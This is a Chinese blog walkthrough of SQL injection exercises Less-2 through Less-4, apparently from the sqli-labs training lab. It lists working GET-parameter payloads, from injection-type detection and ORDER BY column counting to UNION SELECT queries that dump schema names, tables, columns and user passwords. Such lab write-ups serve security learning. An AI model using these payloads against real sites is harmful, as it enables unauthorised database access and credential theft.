Less2-Less4

Posted observering

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Less2-Less4相关的知识,希望对你有一定的参考价值。

Less2
GET_数字型注入

0x01 判断注入类型

?id=1
to use near ‘ LIMIT 0,1‘ at line 1
 LIMIT 0,1
只有一个,没有单双引号,说明为数字型
后台查询语句
select username from users where id=1 limit 0,1

0x02 判断显示字段

?id=1 order by 4 --+
报错,有3列

技术图片

0x03 查询数据库名

?id=-1 union select 1,database(),user() --+

技术图片

0x04 查询表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

技术图片

0x05 查询字段名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+

技术图片

0x06 查询数据

?id=-1 union select 1,2,group_concat(username,password) from users --+

技术图片

Less-3
GET_单引号_小括号_字符型注入

0x01 判断类型

?id=1‘

use near ‘‘1‘‘) LIMIT 0,1‘ at line 1
‘1‘‘) LIMIT 0,1
单引号,单括号

技术图片

0x02 判断显示字段

?id=1‘) order by 4 --+

技术图片

Less-4
GET_双引号_单括号_字符型注入

0x01 类型判断

?id=1"

 to use near ‘"1"") LIMIT 0,1‘ at line 1
"1"") LIMIT 0,1
双引号,单括号

技术图片

0x02 闭合

?id=1") --+

技术图片




以上是关于Less2-Less4的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段4——cli的终端命令大全

web代码片段

Xcode 4.6 的备份代码片段

4.3 合并重复的条件执行片段

以下代码片段的时间复杂度是多少?

ViewPager开关没有显示片段之间